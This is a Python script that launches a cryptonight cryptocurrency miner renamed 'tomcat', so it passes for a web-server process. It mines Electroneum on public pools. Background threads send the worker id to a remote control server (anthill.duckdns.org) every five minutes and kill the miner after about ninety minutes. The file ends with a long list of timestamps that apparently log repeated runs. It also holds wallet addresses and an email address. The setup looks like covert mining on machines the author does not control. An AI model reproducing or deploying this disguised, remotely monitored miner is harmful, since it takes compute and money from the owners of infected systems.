import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:54:04.405461
#2018-02-17 16:43:06.935127
#2018-02-17 18:31:04.995124
#2018-02-17 20:19:07.381583
#2018-02-17 22:07:06.087658
#2018-02-17 23:50:08.111626
#2018-02-18 01:40:08.153523
#2018-02-18 03:27:07.046593
#2018-02-18 05:14:04.685647
#2018-02-18 07:06:07.255184
#2018-02-18 08:54:06.505552
#2018-02-18 10:41:05.290657
#2018-02-18 12:26:07.898943
#2018-02-18 14:14:07.336383
#2018-02-18 16:04:05.547805
#2018-02-18 17:53:06.044676
#2018-02-18 19:40:07.013767
#2018-02-18 21:25:05.685751
#2018-02-18 23:14:03.611286
#2018-02-19 00:59:07.079044
#2018-02-19 02:47:07.126765
#2018-02-19 04:33:07.675042
#2018-02-19 06:18:01.427595
#2018-02-19 08:06:07.001579
#2018-02-19 09:56:06.982866
#2018-02-19 11:46:08.214640
#2018-02-19 13:32:07.458314
#2018-02-19 15:20:08.119057
#2018-02-19 17:08:07.748491
#2018-02-19 18:56:04.300440
#2018-02-19 20:43:04.184910
#2018-02-19 22:29:06.541234
#2018-02-20 00:15:06.677879
#2018-02-20 02:02:06.577106
#2018-02-20 03:52:07.436737
#2018-02-20 05:37:05.221681
#2018-02-20 07:22:07.050363
#2018-02-20 09:09:08.023512
#2018-02-20 10:52:07.758690
#2018-02-20 12:39:06.233442
#2018-02-20 14:25:01.428582
#2018-02-20 16:11:09.179255
#2018-02-20 17:56:10.736207
#2018-02-20 19:46:10.446426
#2018-02-20 21:34:07.784628
#2018-02-20 23:16:01.991589
#2018-02-21 00:59:06.408437
#2018-02-21 02:45:09.825590
#2018-02-21 04:32:04.128720
#2018-02-21 06:19:04.136978
#2018-02-21 08:05:06.039498
#2018-02-21 09:51:05.044711
#2018-02-21 11:40:03.460293
#2018-02-21 13:29:08.152052
#2018-02-21 15:14:07.767317
#2018-02-21 17:04:06.380387
#2018-02-21 18:51:08.536038
#2018-02-21 20:39:07.133602
#2018-02-21 22:24:04.339723
#2018-02-22 00:13:06.949132
#2018-02-22 01:59:07.183448
#2018-02-22 03:46:06.549258
#2018-02-22 05:33:03.929284
#2018-02-22 07:19:07.207112
#2018-02-22 09:06:06.228454
#2018-02-22 10:54:04.145071
#2018-02-22 12:39:07.909264
#2018-02-22 14:23:06.872050
#2018-02-22 16:11:10.638286
#2018-02-22 17:58:02.068077
#2018-02-22 19:47:06.388749
#2018-02-22 21:37:08.053015
#2018-02-22 23:26:08.105423
#2018-02-23 01:13:08.551927
#2018-02-23 03:01:08.717339
#2018-02-23 04:47:06.233929
#2018-02-23 06:34:05.975795
#2018-02-23 08:22:06.913381
#2018-02-23 10:38:05.130845
#2018-02-23 12:32:03.215071
#2018-02-23 14:19:04.058515
#2018-02-23 16:10:03.754949
#2018-02-23 17:56:01.673548
#2018-02-23 19:42:01.974787
#2018-02-23 21:25:04.000228
#2018-02-23 23:13:05.319036
#2018-02-24 01:03:07.290804
#2018-02-24 02:55:01.726654
#2018-02-24 04:43:06.216591
#2018-02-24 06:27:06.793743
#2018-02-24 08:16:06.560402
#2018-02-24 09:59:05.469333
#2018-02-24 11:58:06.893655
#2018-02-24 13:46:03.795003
#2018-02-24 15:37:06.150766
#2018-02-24 17:32:05.246284
#2018-02-24 19:19:01.508231
#2018-02-24 21:09:04.557309
#2018-02-24 23:42:07.375695
#2018-02-25 03:44:04.196138
#2018-02-25 07:28:07.394861